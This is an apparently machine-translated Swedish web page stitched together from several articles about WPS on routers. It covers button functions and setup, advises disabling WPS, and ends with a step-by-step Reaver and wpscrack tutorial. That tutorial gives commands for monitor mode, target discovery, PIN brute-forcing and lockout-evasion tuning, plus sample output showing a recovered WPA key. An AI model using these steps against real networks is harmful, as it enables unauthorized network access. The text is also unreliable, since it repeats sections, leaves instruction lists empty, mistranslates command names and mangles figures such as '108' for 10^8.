Vad betyder knapparna på tp link-routern? WPS-kontroll i Asus. Aktivera och konfigurera Wi-Fi Protected Setup på D-Link

Standard WPS skapades specifikt för enkel, snabb och viktigast av allt effektiv anslutning av kompatibla enheter till ett trådlöst Wi-Fi-nätverk.

Jag inser att det inte alls är coolt att skriva om gamla normer! Vad ska man göra om 60 % inte ens har hört talas om en sådan standard.

Ofta klagar folk till mig att deras router har blivit hackad. Självklart säger eller skriver jag - TROUBLE VÄN!

Och jag ska bara påminna dig om några triviala tips för att förbättra skyddet av hemroutrar från hackning, speciellt WPS.

Dess huvudsakliga mål är att automatisera processen för att sätta upp ett trådlöst Wi-Fi-nätverk, vilket avsevärt förenklar livet för användare av trådlösa enheter.

Det här är bra, så låt oss prata lite om hur man ställer in WPS och sedan varför många stänger av det.

Att ställa in ett trådlöst WiFi-nätverk med WPS-funktionen tar minimal tid.

För att ansluta en enhet behöver du bara trycka på knappen med samma namn och vänta på att de trådlösa enheterna ska kommunicera med varandra.

Denna effektiva teknik låter dig konfigurera ditt Wi-Fi-nätverk på mycket kort tid.

Låt mig påminna dig:
Du måste ange följande nummer i adressfältet: "192.168.0.1". Efter övergången kommer ett nytt auktoriseringsfönster upp, där du måste ange ordet "admin" eller önskat om du har angett ett lösenord i fälten "Användarnamn" och "Lösenord".

Låt oss gå, vad händer härnäst...

Kärnan i WPS-tekniken är att alla viktiga parametrar överförs från routern till kontrollern efter en speciell begäran.

En sådan begäran skickas med olika metoder.

Du kan använda WPS-knappen på routerpanelen, du kan använda en speciell unik PIN-kod, du kan aktivera WPS-funktionen i routerinställningarna.

I vissa routermodeller kombineras denna knapp med Reset-knappen, som används för att återställa inställningar. Vissa tillverkare använder namnet QSS istället för WPS.

Du kan dock fortfarande hitta prylar som inte implementerar WPS-funktionen. Dessutom finns det ingen WPS-knapp på persondatorer och bärbara datorer, även om operativsystemet ofta stöder denna teknik.

Närvaron eller frånvaron av en WPS-knapp kan påverka hur du ansluter till WPS.

Vi väntar 1-2 minuter.

Under denna tid kommer båda enheterna att kommunicera med varandra, och alla nödvändiga anslutningsparametrar kommer att konfigureras automatiskt.

Observera att på vissa routrar är WPS- och Reset-knapparna kombinerade till en.

För att använda en sådan knapp som WPS, tryck inte på den i mer än 4 sekunder, annars fungerar den som Återställ och återställer alla inställningar för routern.

WPS-auktoriseringsmetoder:

PBC-läge (Push Button Configuration).
Auktorisering med PIN-kod

Om både routern och den anslutna enheten har en WPS-knapp, behöver användaren inte göra några inställningar för att ansluta till Wi-Fi-nätverket.

Tryck och håll in WPS-knappen på enheten i 2-3 sekunder och släpp. Efter detta håller du ner WPS-knappen på routern i 2-3 sekunder och släpper.

Små tillägg...

Operativsystem i Windows-familjen, som börjar med Vista SP2, har stöd för WPS-teknik. För de operativsystem som inte stöder WPS släpps specialiserade programvaruverktyg som gör det möjligt att använda WPS för att ansluta till ett Wi-Fi-nätverk.

Oftast är PIN-koden skriven på routerns etikett och placerad på dess bottenpanel. Denna kod kan ändras i routerns inställningar.

WPS-knappen är oftast installerad på fram-, sido- eller bakpanelen på routern. Du måste trycka på den i 2-3 sekunder.

Ibland signeras den som QSS eller kombineras med Reset-knappen. I det andra fallet är det viktigaste att inte överdriva det med tiden du håller ner knappen, eftersom det annars kan återställa inställningarna.

När du ställer in ett trådlöst WPS-nätverk, se till att komma ihåg eller skriva ner säkerhetsnyckeln.

Fördelar med WPS:

Anslut till ett Wi-Fi-nätverk med en knapptryckning
Enkelhet och enkel anslutning
Höghastighetsanslutning av enheter till det trådlösa nätverket
Möjlighet att sätta upp ett nätverk utan att gå in i WEB-gränssnittet
Automatisk tilldelning av nätverksnamn och säkerhetsnyckel för routern
Enheten behöver inte känna till nätverksnamnet och säkerhetsnyckeln för att ansluta till Wi-Fi

Nackdelar med WPS:

Svårigheter att ansluta en inkompatibel enhet till ett nätverk konfigurerat med WPS
Du kan knäcka din PIN-kod med brute force

Nu har vi kommit till punkten varför en så bra teknik är farlig att använda.

Och så, denna teknik stöds av många routrar och är den mest sårbara. Representerar en knapp på routern, eller en 8-siffrig PIN-kod som skickar nätverksparametrar. Naturligtvis kan PIN-koden lätt hittas med brute force.

För tillfället är den mest relevanta hackningsmetoden att välja en WPS-pin.

För att brute force PIN-koden måste routern ha WPS-läge aktiverat, vilket ofta är fallet i detta tillstånd, men det händer att den är avstängd, men detta garanterar inte att den verkligen är avstängd.

PIN-koden består av åtta siffror - därför finns det 108 (100'000'000) valmöjligheter.
Antalet alternativ kan dock minskas avsevärt.

Faktum är att den sista siffran i PIN-koden är en slags kontrollsumma, som beräknas utifrån de första sju siffrorna.

Som ett resultat får vi redan 107 (10 000 000) alternativ. Protokollets sårbarhet gör att du kan dela upp PIN-koden i två delar, 4 och 3 siffror, och kontrollera var och en separat för giltighet.

Därför får vi 104 (10 000) alternativ för första halvåret och 103 (1 000) för andra. Som ett resultat finns det bara 11 000 alternativ för en fullständig sökning, vilket är ~910 gånger mindre.

Hacking skydd

För närvarande finns det bara ett sätt att skydda dig från en attack - inaktivera QSS WPS i routerinställningarna.

Till exempel (TP-Link), skriv in 192.168.0.1 i webbläsarraden och tryck på enter. Ett fönster kommer upp där du måste logga in, det vill säga ange ditt användarnamn och lösenord.

Därefter, i menyn till vänster, hitta objektet som kommer att tala om QSS. Hitta knappen Inaktivera QSS.
"Starta om". Eller koppla bara ur routern från uttaget i några sekunder - effekten är densamma. Denna instruktion är lämplig för TP-LINK-routrar

Det är sant att detta inte alltid är möjligt. Eftersom sårbarheten inte finns på implementeringsnivå, utan på protokollnivå.

Det mesta som tillverkare kan göra är att släppa firmware som gör att en timeout kan införas för att blockera användaren, till exempel efter 5 misslyckade försök att ange en PIN-kod, vilket kommer att komplicera brute force och öka tiden det tar för en angripare att välj en identifierare.

Ett annat sätt är att använda inte bara siffror utan även bokstäver i PIN-koden. Seriöst, du måste bara acceptera att allt runt omkring dig är potentiellt sårbart. Det finns inga konspirationsteorier eller mystiska Big Brother här.

Om du är rädd för allt är det bara att stänga av WPS! Routrar som inte stöder denna teknik är säkrare. WPS är inte ens en ny uppfinning alls :) Huvudpoängen i artikeln handlar dock om säkerhet. Som, det skulle inte skada att inaktivera den här funktionen om du använder WiFi på trånga platser (kaféer, butiker, etc.)

Vi läser också:

Lycka till, vänner!

Mystisk WPS-knapp på routern - vad är det?

På de flesta enheter finns vanligtvis en knapp med en inskription eller en glödande WPS-märkning på sidan av fodralet på kontrollpanelen eller på baksidan bredvid kontaktuttagen.

Grafiskt indikeras denna nyckel i form av två välvda pilar riktade mot varandra. Placeringen av knappen visas i fig. Nr 1 och 2.

Det är inte många som har en uppfattning om hur man korrekt konfigurerar WPS-funktionen på själva routern.

WPS-läge på en router - vad är det?

Detta är en standard eller, i professionell terminologi, ett protokoll. Den utvecklades 2007.

Förkortningen WPS betyder Wi-Fi Protected Setup – en säker anslutning till ett Wi-Fi-nätverk.

Detta protokoll har utformats speciellt för oerfarna användare.

Enkelheten i denna standard gör att alla genomsnittliga personer kan ansluta och självständigt konfigurera distributionen av en lokal trådlös internetnätverkssignal på routern.

Dessutom ansluter detta läge automatiskt enheten till World Wide Web efter en omstart, även om åtkomstlösenordet har tappats bort.

WPS-tekniken låter dig automatiskt tilldela ett namn till ditt hemnätverk, generera en kod för att skydda det från obehörig åtkomst och sända en stabil radiosignal samtidigt till flera enheter (smarttelefon, surfplatta, bärbar dator, TV med Smart-alternativ).

Samtidigt ger systemet snabb informationsöverföring. Olika modeller av hemmabasstationer aktiverar trådlöst läge på olika sätt.

Hur WPS-läget fungerar

Algoritmen för att styra denna funktion är enkel. Att ställa in och installera om ett trådlöst nätverk omfattar två steg:

  • ställa in åtkomstpunkten för själva routern;
  • ansluta användare till ett skapat och aktiverat lokalt trådlöst nätverk.

WPS-protokollet förenklar dessa manipulationer avsevärt.

Operationen konfigureras automatiskt genom att överföra nödvändiga data från routern till styrenheten.

I det här fallet förblir nätverksidentifieraren (namn) - SSID - densamma. Och ett nytt säkerhetslösenord genereras slumpmässigt av processorn.

WPS-protokollet stöds av alla operativsystem skapade på Windows-plattformen, designade för både stationära datorer och mobila enheter.

För operativsystem som inte har integrerade verktyg för WPS har speciella drivrutiner utvecklats som gör att du kan ansluta till ett trådlöst nätverk.

Hur konfigurerar man ett trådlöst nätverk?

En av fördelarna med WPS-standarden är möjligheten att konfigurera utan att behöva gå in i det digitala gränssnittet. Det finns två alternativ för att aktivera ditt hemnätverk:

  • hårdvara
  1. genom att trycka på WPS-knappen på routern; detta automatiska konfigurationsläge kallas Push button connect;
  2. Om det inte finns någon knapp kan dess virtuella version hittas i enhetens digitala gränssnitt
  • program
  1. vissa moduler som stöder WPS-protokollet har inte en automatisk återställningsknapp på kroppen för att aktivera nätverket via WEB-gränssnittet, du måste ange en åttasiffrig PIN-kod;
  2. Du kan även ange PIN-koden via en dator (laptop) efter att ha anslutit till routern och aktiverat programsessionen.

Råd. PIN-koden är tryckt av tillverkaren på en etikett på baksidan eller undersidan av enhetens hölje (se fig. 3). I utrustningsinställningarna kan koden ändras av användaren.

Efter att ha tryckt på knappen bör du vänta i två till tre minuter.

Under denna tid upprättar alla aktiverade enheter kontakt med varandra och därmed konfigureras ett lokalt nätverk.

Om mottagaradaptrarna också har en WPS-knapp, trycks den in direkt efter att knappen på routern slagits på.

Ljusindikering på routern

Om WPS-funktionen på utrustningen har en ljusindikation, kan tillståndet för hemnätverkets anslutning till den inkommande internetnätverket övervakas visuellt.

Om anslutningen är bruten eller om det inte finns någon signal från det externa nätverket, tänds inte indikatorn på routern.

Om indikatorlampan blinkar betyder det att routern är i programinställningsstadiet eller att mottagningsenheterna inte är korrekt anslutna.

Du kan behöva stänga av och starta om basstationen.

När indikatorn lyser konstant fördelas signalen stabilt. Denna funktionella lösning används på de flesta enheter.

Om det inte finns någon WPS-knapp på routern?

På vissa routrar kombineras återställningsknappen för det trådlösa nätverkets signaldistribution med återställningsknappen.

Ett liknande exempel kan ses i figuren.

I det här fallet, för att ställa in signalen, måste du trycka och hålla in Wi-Fi-återställningsknappen en gång i 2 sekunder.

Hårdvaruinställningarna återställs efter att du håller knappen intryckt i 5-10 sekunder.

Om detta inte är nödvändigt bör du vara försiktig.

På TP-Link nätverksutrustning kallas Wi-Fi-anslutningsfunktionen QSS, vilket betyder Quick Secure Setup – en snabb säker anslutning.

Denna funktion är redan aktiverad som standard på fabriken.

Hur inaktiverar jag WPS på routern i det här fallet?

För att göra detta, såväl som för efterföljande ominstallation, måste du hitta fliken "Säkerhet" i menyn. Det kommer att indikera statusen "Aktivera".

För att inaktivera, välj kommandot "Disable QSS" eller "Disable WPS" (se fig. 5).

Råd. När du ställer in ett WPS-hemnätverk bör du komma ihåg eller skriva ner åtkomstnyckeln.

Andra WPS-knappfunktioner

Processorerna i vissa routrar gör det möjligt att ändra nyckelns funktionella syfte.

Tillverkarna inkluderade denna lösning för att optimera enhetens funktion.

ASUS Wrt-routerprogrammet låter dig använda WPS-nyckeln endast för att slå på och av signaldistribution.

För att göra korrigeringar av fabriksinställningarna ska du via WEB-gränssnittet gå in i katalogen "Administration" och öppna fliken "System".

Alternativet "WPS-knappbeteende" bör åsidosättas genom att välja kommandot "Växla radio".

Förkortningen WPS på en router är en förkortning för "Wi-Fi Protected Setup". Tekniken skapades för att förenkla anslutningen av olika enheter till nätverket. Det stöds av nästan alla routrar. Dess största fördel är att du inte behöver ange ett lösenord på din telefon eller bärbara dator för att ansluta. Detta gäller särskilt när du har glömt ditt Wi-Fi-lösenord, och det inte går att leta i routerns inställningar. Artikeln kommer att beskriva i detalj hur denna teknik fungerar, samt ge instruktioner för dess användning.

Hur WPS-läget fungerar

Nu när vi har tagit reda på vad WPS är, är det värt att prata om algoritmen för denna teknik. För att skapa ett trådlöst nätverk måste användaren konfigurera routerns åtkomstpunkt och ansluta till enhetens lokala nätverk genom att ange ett säkerhetslösenord.

WPS förenklar denna procedur avsevärt. Styrenheten genererar ett slumpmässigt lösenord automatiskt och överför det sedan till enheten som ansluter till nätverket via Wi-Fi Protected Setup. Tack vare detta behöver du inte självständigt söka efter ditt nätverk bland andra och ange lösenordet manuellt

WPS-protokollet stöds av Windows-operativsystem och de flesta mobila prylar som kör Android OS. På de operativsystem som inte har inbyggda verktyg kan du ladda ner en speciell drivrutin som utökar systemets funktionalitet.

Använder WPS (QSS) på en router

Du kan ansluta enheter till routern med WPS antingen hårdvara eller mjukvara. Allt beror på vilken gadget du ansluter till det trådlösa nätverket.

Hårdvaruanslutning: vad är det och hur används det

Det första alternativet involverar bara två åtgärder: du måste trycka på knapparna med motsvarande beteckning på routern och på den anslutna gadgeten. WPS-knappen på en router är vanligtvis placerad på baksidan av enheten.

I vissa fall kombineras knappen med återställningsfunktionen (RESET). Om du inte vill återställa routern till fabriksinställningarna, håll den inte i mer än 5 sekunder. Motsvarande lampa på routerns frontpanel kommer att meddela dig att WPS-funktionen är aktiverad.

Mjukvaruanslutning av mobiltelefon/surfplatta

Operativsystemet Android inkluderar en anslutningsfunktion via WPS. För att använda det, följ instruktionerna nedan, nämligen:


Om allt görs korrekt kommer smarttelefonen att ansluta till ditt lokala nätverk.

Ansluta en Windows-enhet

Du kan använda Wi-Fi på din bärbara dator efter att ha upprättat en anslutning till routern via WPS. För att göra detta måste du följa flera steg:

Om du behöver inaktivera detta protokoll på routrar, tryck helt enkelt på knappen (om det inte finns där kan du bara inaktivera WPS på routern genom inställningarna).

Vad du ska göra om det inte finns någon WPS-knapp på routern: exempel på aktivering

Många modeller tillhandahåller inte hårdvaruaktivering av Wi-Fi Protected Setup-protokollet. Detta innebär att anslutningen sker via WEB-gränssnittet. För att göra detta måste du göra följande:


Efter att ha slutfört dessa manipulationer kommer du att kunna använda Wi-Fi utan problem. Ofta anges den åttasiffriga PIN-kombinationen på ett klistermärke som fästs på modemfodralet.

Det finns ett alternativt alternativ för att ansluta mobila enheter:


När du anger rätt kombination kommer din mobiltelefon eller surfplatta att vara ansluten till nätverket. Denna funktion låter dig ansluta alla enheter som stöder detta protokoll till Wi-Fi.

Hur man inaktiverar WPS genom inställningar

För att inaktivera måste du klicka på knappen "Inaktivera" i motsvarande sektion av routern eller välja alternativet Inaktiverat.

För inte så länge sedan verkade det som att ett trådlöst nätverk skyddat med WPA2-teknik var ganska säkert. Att hitta en enkel nyckel för att ansluta är verkligen möjligt. Men om du installerar en riktigt lång nyckel hjälper varken regnbågstabeller eller ens GPU-acceleration dig att fixa det. Men, som det visade sig, kan du ansluta till ett trådlöst nätverk utan detta – genom att dra nytta av en nyligen upptäckt sårbarhet i WPS-protokollet.

VARNING

All information presenteras endast i utbildningssyfte. Att tränga in i någon annans trådlösa nätverk kan lätt betraktas som ett brott. Tänk med huvudet.

Priset för förenklingar

Det blir färre och färre öppna accesspunkter som du inte behöver ange en nyckel till för att ansluta alls. Det verkar som att de snart kan listas i Röda boken. Om en person tidigare kanske inte ens visste att ett trådlöst nätverk kan låsas med en nyckel, skyddar sig själv från externa anslutningar, nu får han allt mer information om denna möjlighet. Ta till exempel anpassad firmware som ledande leverantörer släpper för populära routermodeller för att förenkla installationen. Du måste ange två saker - inloggning/lösenord och... en nyckel för att skydda det trådlösa nätverket. Ännu viktigare är att hårdvarutillverkarna själva försöker göra installationsprocessen enkel. Således stöder de flesta moderna routrar mekanismen WPS (Wi-Fi Protected Setup). Med dess hjälp kan användaren sätta upp ett säkert trådlöst nätverk på några sekunder, utan att störa sig alls med det faktum att "du måste aktivera kryptering någon annanstans och registrera en WPA-nyckel." Jag skrev in den åttasiffriga symboliska PIN-koden i systemet, som är skriven på routern, och du är klar! Och här, håll i dig. I december talade två forskare om allvarliga grundläggande brister i WPS-protokollet. Det är som en bakdörr för vilken router som helst. Det visade sig att om WPS är aktiverat vid åtkomstpunkten (som för ett ögonblick är aktiverad i de flesta routrar som standard), så kan du välja en PIN-kod för anslutning och extrahera nyckeln för anslutning inom några timmar!

Hur fungerar WPS?

Idén med skaparna av WPS är bra. Mekanismen ställer automatiskt in nätverksnamn och kryptering. Användaren behöver alltså inte gå in i webbgränssnittet och hantera komplexa inställningar. Och du kan enkelt lägga till vilken enhet som helst (till exempel en bärbar dator) till ett redan konfigurerat nätverk: om du anger PIN-koden korrekt kommer den att få alla nödvändiga inställningar. Detta är väldigt bekvämt, varför alla de stora aktörerna på marknaden (Cisco/Linksys, Netgear, D-Link, Belkin, Buffalo, ZyXEL) nu erbjuder trådlösa routrar med WPS-stöd. Låt oss titta på det lite mer detaljerat.

Det finns tre alternativ för att använda WPS:

  1. Tryck-knapp-anslut (PBC). Användaren trycker på en speciell knapp på routern (hårdvaran) och på datorn (mjukvaran), och aktiverar därmed installationsprocessen. Vi är inte intresserade av detta.
  2. Ange en PIN-kod i webbgränssnittet. Användaren kommer åt routerns administrativa gränssnitt genom en webbläsare och anger den åttasiffriga PIN-koden som är skriven på enhetens kropp (Figur 1), varefter installationsprocessen sker. Denna metod är mer lämplig för den initiala konfigurationen av routern, så vi kommer inte att överväga det heller.
  3. Ange PIN-koden på användarens dator (Figur 2). När du ansluter till en router kan du öppna en speciell WPS-session, inom vilken du kan konfigurera routern eller få befintliga inställningar om du anger PIN-koden korrekt. Detta är redan attraktivt. Ingen autentisering krävs för att öppna en sådan session. Vem som helst kan göra detta! Det visar sig att PIN-koden redan är potentiellt mottaglig för en bruteforce-attack. Men det här är bara blommor.

Sårbarhet

Som jag noterade tidigare består PIN-koden av åtta siffror - därför finns det 10^8 (100 000 000) alternativ att matcha. Antalet alternativ kan dock minskas avsevärt. Faktum är att den sista siffran i PIN-koden är en slags kontrollsumma, som beräknas utifrån de första sju siffrorna. Som ett resultat får vi redan 10^7 (10 000 000) alternativ. Men det är inte allt! Därefter tittar vi noggrant på enheten för WPS-autentiseringsprotokollet (Figur 3). Det känns som att det var speciellt designat för att lämna utrymme för brute force. Det visar sig att PIN-kodverifiering utförs i två steg. Den är uppdelad i två lika delar, och varje del kontrolleras separat! Låt oss titta på diagrammet:

  1. Om angriparen, efter att ha skickat M4-meddelandet, fick ett EAP-NACK som svar, kan han vara säker på att den första delen av PIN-koden är felaktig.
  2. Om han fick ett EAP-NACK efter att ha skickat M6, så är den andra delen av PIN-koden felaktig. Vi får 10^4 (10 000) alternativ för den första halvan och 10^3 (1 000) för den andra. Som ett resultat har vi bara 11 000 alternativ för en fullständig sökning. För att bättre förstå hur detta kommer att fungera, titta på diagrammet.
  3. En viktig punkt är den möjliga sökhastigheten. Den begränsas av den hastighet med vilken routern bearbetar WPS-förfrågningar: vissa åtkomstpunkter ger resultat varje sekund, andra var tionde sekund. Den mesta tiden ägnas åt att beräkna den publika nyckeln med hjälp av Diffie-Hellman-algoritmen, den måste genereras före steg M3. Tiden som läggs på detta kan minskas genom att välja en enkel hemlig nyckel på klientsidan, vilket kommer att förenkla beräkningarna av andra nycklar i framtiden. Övning visar att för ett lyckat resultat räcker det vanligtvis att gå igenom bara hälften av alla alternativ, och i genomsnitt tar brute force bara fyra till tio timmar.

Första implementeringen

Den första implementeringen av brute force som dök upp var verktyget wpscrack (goo.gl/9wABj), skrivet av forskaren Stefan Viböck i Python. Verktyget använde Scapy-biblioteket, som låter dig injicera godtyckliga nätverkspaket. Skriptet kan endast köras under ett Linux-system, efter att det trådlösa gränssnittet först har växlats till övervakningsläge. Som parametrar måste du ange namnet på nätverksgränssnittet i systemet, MAC-adressen för den trådlösa adaptern, samt MAC-adressen för åtkomstpunkten och dess namn (SSID).

$ ./wpscrack.py --iface mon0 --client 94:0c:6d:88:00:00 --bssid f4:ec:38:cf:00:00 --ssid testap -v sniffer började försöka 00000000 försök tog 0,95 sekunder försöker 00010009<...>försök 18660005 försök tog 1,08 sekunder försök 18670004# hittade första halvan av PIN-försök tog 1,09 sekunder försök 18670011 försök tog 1,08 sekunder<...>försöker 18674095# hittade 2:a halvan av PIN-koden<...>Nätverksnyckel: 0000 72 65 61 6C 6C 79 5F 72 65 61 6C 6C 79 5F 6C 6F really_really_lo 0010 6E 67 5F 77 70 61 5F 70 61 7 0 7 2 0 5 5F 67 6F 6F 64 6F 6C 75 63 6B 5F 63 72 61 63 e_good_luck_crac 0030 6B 69 6E 67 5F 74 68 69 73 5F 6F 6E 65king_this_one<...>

Som du kan se valdes först den första hälften av PIN-koden, sedan den andra, och till slut producerade programmet en färdig att använda nyckel för att ansluta till det trådlösa nätverket. Det är svårt att föreställa sig hur lång tid det skulle ha tagit att hitta en nyckel av denna längd (61 tecken) med redan existerande verktyg. Wpscrack är dock inte det enda verktyget för att utnyttja sårbarheten, och detta är ett ganska roligt ögonblick: samtidigt arbetade en annan forskare, Craig Heffner från Tactical Network Solutions, med samma problem. När han såg att en fungerande PoC för att implementera en attack dök upp på Internet, publicerade han sitt Reaver-verktyg. Det automatiserar inte bara processen att välja WPS-PIN och extrahera PSK-nyckeln, utan erbjuder också ett större antal inställningar så att attacken kan utföras mot en mängd olika routrar. Dessutom stöder den ett mycket större antal trådlösa adaptrar. Vi bestämde oss för att ta det som grund och beskriva i detalj hur en angripare kan använda en sårbarhet i WPS-protokollet för att ansluta till ett säkert trådlöst nätverk.

HUR

Som med alla andra attacker på ett trådlöst nätverk behöver vi Linux. Här ska det sägas att Reaver finns i arkivet för den välkända distributionen BackTrack, som även redan innehåller nödvändiga drivrutiner för trådlösa enheter. Därför kommer vi att använda det exakt.

Steg 0. Förbered systemet

På den officiella hemsidan finns BackTrack 5 R1 tillgänglig för nedladdning som en virtuell maskin under VMware och en startbar ISO-avbild. Jag rekommenderar det sista alternativet. Du kan helt enkelt skriva bilden på en skiva, eller så kan du använda programmet för att skapa ett startbart USB-minne: på ett eller annat sätt, efter uppstart från ett sådant medium, kommer vi omedelbart att ha ett system redo för arbete utan onödiga problem.

Snabbkurs i Wi-Fi-hackning

  1. WEP (Wired Equivalent Privacy) Den allra första tekniken för att skydda ett trådlöst nätverk visade sig vara extremt svag. Du kan hacka den bokstavligen på några minuter, med hjälp av svagheterna i RC4-chifferet som används i det. De viktigaste verktygen här är airodump-ng sniffer för att samla in paket och aircrack-ng-verktyget, som används direkt för att knäcka nyckeln. Det finns också ett specialverktyg wesside-ng, som vanligtvis hackar alla närliggande WEP-punkter automatiskt.
  2. WPA/WPA2 (trådlös skyddad åtkomst)

Brute force är det enda sättet att hitta en nyckel för ett slutet WPA/WPA2-nätverk (och även då bara om det finns en dumpning av det så kallade WPA Handshake, som sänds när en klient ansluter till en accesspunkt).

Brut force kan dra i dagar, månader och år. För att öka effektiviteten i sökningen användes först specialiserade ordböcker, sedan genererades regnbågstabeller, och senare dök upp verktyg som använde NVIDIA CUDA och ATI Stream-tekniker för att hårdvara accelerera processen med hjälp av GPU. Verktygen som används är aircrack-ng (brute force med hjälp av en ordbok), cowpatty (med regnbågstabeller), pyrit (med ett grafikkort).

Steg 1: Logga in

Standardinloggning och lösenord är root:toor. Väl i konsolen kan du säkert starta "X" (det finns separata BackTrack-sammansättningar - både med GNOME och KDE):

#startx

Steg 2: Installera Reaver

För att ladda ner Reaver behöver vi internet. Därför ansluter vi patchkabeln eller konfigurerar den trådlösa adaptern (menyn "Program > Internet > Wicd Network Manager"). Därefter startar vi terminalemulatorn, där vi laddar ner den senaste versionen av verktyget via förvaret:

# apt-get update # apt-get installation reaver

Här måste jag säga att förvaret innehåller version 1.3, som personligen inte fungerade korrekt för mig. Efter att ha sökt information om problemet hittade jag ett inlägg av författaren, som rekommenderar att man uppdaterar till högsta möjliga version genom att sammanställa källor hämtade från SVN. Detta är i allmänhet den mest universella installationsmetoden (för alla distributioner).

$ svn kassan http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps $ cd ./reaver-wps/src/ $ ./configure $ make # make install

Det blir inga problem med montering under BackTrack - jag kollade det personligen. I Arch Linux-distributionen som jag använder är installationen ännu enklare, tack vare närvaron av motsvarande PKGBUILD:

$ yaourt -S reaver-wps-svn

Steg 3. Förbereder sig för brute force

För att använda Reaver måste du göra följande:

  • växla den trådlösa adaptern till övervakningsläge;
  • ta reda på namnet på det trådlösa gränssnittet;
  • ta reda på MAC-adressen för åtkomstpunkten (BSSID);
  • se till att WPS är aktiverat på punkten.

Låt oss först kontrollera att det trådlösa gränssnittet överhuvudtaget finns i systemet:

#iwconfig

Om utgången av det här kommandot innehåller ett gränssnitt med en beskrivning (vanligtvis wlan0), betyder det att systemet kände igen adaptern (om det var anslutet till det trådlösa nätverket för att ladda Reaver, är det bättre att koppla från anslutningen). Låt oss sätta adaptern i övervakningsläge:

# airmon-ng starta wlan0

Detta kommando skapar ett virtuellt gränssnitt i övervakningsläge, dess namn kommer att anges i kommandoutgången (vanligtvis mon0). Nu måste vi hitta åtkomstpunkten för att attackera och ta reda på dess BSSID. Låt oss använda verktyget för att lyssna på trådlösa sändningar airodump-ng:

#airodump-ngmon0

En lista med åtkomstpunkter inom räckvidd visas på skärmen. Vi är intresserade av poäng med WPA/WPA2-kryptering och PSK-nyckelautentisering.

Det är bättre att välja en av de första i listan, eftersom god kommunikation med punkten är önskvärd för att utföra en attack. Om det finns många punkter och listan inte passar på skärmen, kan du använda ett annat välkänt verktyg - kismet, där gränssnittet är mer lämpligt i detta avseende. Alternativt kan du kontrollera på plats om WPS-mekanismen är aktiverad vid vår punkt. För att göra detta kommer Reaver med (men bara om du tar det från SVN) tvättverktyget:

# ./tvätt -i mån0

Parametern är namnet på gränssnittet som växlat till övervakningsläge. Du kan också använda alternativet '-f' och mata verktyget med en cap-fil skapad, till exempel, av samma airodump-ng. Av någon okänd anledning inkluderade inte Reaver-paketet i BackTrack tvättverktyget. Låt oss hoppas att det här felet kommer att rättas till när den här artikeln publiceras.

Steg 4. Kör brute force

Nu kan du fortsätta direkt till att söka efter din PIN-kod. I det enklaste fallet behöver du inte mycket för att starta Reaver. Du behöver bara ange namnet på gränssnittet (som vi tidigare bytte till övervakningsläge) och BSSID för åtkomstpunkten:

# reaver -i mon0 -b 00:21:29:74:67:50 -vv

"-vv"-omkopplaren möjliggör förbättrad programutgång så att vi kan se till att allt fungerar som förväntat.

Reaver v1.4 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner [+] Waiting for beacon from 00:21:29:74:67:50 [+] Associated with 00:21:29:74:67:50 (ESSID: linksys) [+] Testing pin 63979978

Om programmet konsekvent skickar PIN-koder till åtkomstpunkten betyder det att allt har börjat bra, och det återstår bara att vänta dumt. Processen kan ta lång tid. Den kortaste tiden under vilken jag kunde brutalt tvinga en PIN-kod var ungefär fem timmar. Så snart det är valt kommer programmet gärna att informera dig om det:

[+] Försöker pin 64637129 [+] Nyckeln knäcktes på 13654 sekunder [+] WPS PIN: "64637129" [+] WPA PSK: "MyH0rseThink$YouStol3HisCarrot!" [+] AP SSID: "linksys"

Det mest värdefulla här är förstås WPA-PSK-nyckeln, som du direkt kan använda för att ansluta. Allt är så enkelt att det inte ens passar i ditt huvud.

Är det möjligt att försvara sig?

För närvarande finns det bara ett sätt att skydda dig från en attack - inaktivera WPS i routerinställningarna. Men som det visade sig är detta inte alltid möjligt. Eftersom sårbarheten inte finns på implementeringsnivå, utan på protokollnivå, bör du inte förvänta dig en snabb patch från tillverkare som skulle lösa alla problem. Det mesta de kan göra nu är att motstå brute force så mycket som möjligt. Om du till exempel blockerar WPS i en timme efter fem misslyckade försök att ange PIN-koden, kommer sökningen att ta cirka 90 dagar. Men en annan fråga är, hur snabbt kan en sådan patch rullas ut till miljontals enheter som fungerar över hela världen?

Uppgradering av Reaver

I HOWTO:n visade vi det enklaste och mest mångsidiga sättet att använda verktyget Reaver. WPS-implementeringen varierar dock från tillverkare till tillverkare, så i vissa fall krävs ytterligare konfiguration. Nedan kommer jag att tillhandahålla ytterligare alternativ som kan öka hastigheten och effektiviteten för nyckelsökning.

  1. Du kan ställa in kanalnumret och SSID för åtkomstpunkten: # reaver -i mon0 -b 00:01:02:03:04:05 -c 11 -e linksys
  2. Alternativet '—dh-small' har en gynnsam effekt på brute force-hastigheten, eftersom det anger ett litet värde för den hemliga nyckeln, vilket underlättar beräkningar på åtkomstpunktssidan: # reaver -i mon0 -b 00:01:02: 03:04:05 -vv - -dh-liten
  3. Standardtid för svar är fem sekunder. Om det behövs kan du ändra det: # reaver -i mon0 -b 00:01:02:03:04:05 -t 2
  4. Standardfördröjningen mellan försöken är en sekund. Den kan också konfigureras: # reaver -i mon0 -b 00:01:02:03:04:05 -d 0
  5. Vissa åtkomstpunkter kan blockera WPS under en viss tid och misstänker att de blir lurade. Reaver märker denna situation och pausar sökningen i 315 sekunder som standard, varaktigheten för denna paus kan ändras: # reaver -i mon0 -b 00:01:02:03:04:05 --lock-delay=250
  6. Vissa implementeringar av WPS-protokollet kommer att avsluta anslutningen om PIN-koden är felaktig, även om de enligt specifikationen ska returnera ett speciellt meddelande. Reaver känner automatiskt igen denna situation, för detta finns ett "—nack"-alternativ: # reaver -i mon0 -b 00:01:02:03:04:05 --nack
  7. Alternativet '--eap-terminate' är avsett att fungera med de AP:er som kräver avslutning av WPS-sessionen med EAP FAIL-meddelandet: # reaver -i mon0 -b 00:01:02:03:04:05 --eap -avsluta
  8. Förekomsten av fel i WPS-sessionen kan innebära att AP begränsar antalet försök att ange en PIN-kod, eller helt enkelt är överbelastad med förfrågningar. Information om detta kommer att visas på skärmen. I det här fallet pausar Reaver sin aktivitet och paustiden kan ställas in med alternativet '--fail-wait': # reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait =360

FAQ

Fråga: Vilken trådlös adapter behövs för att hacka?

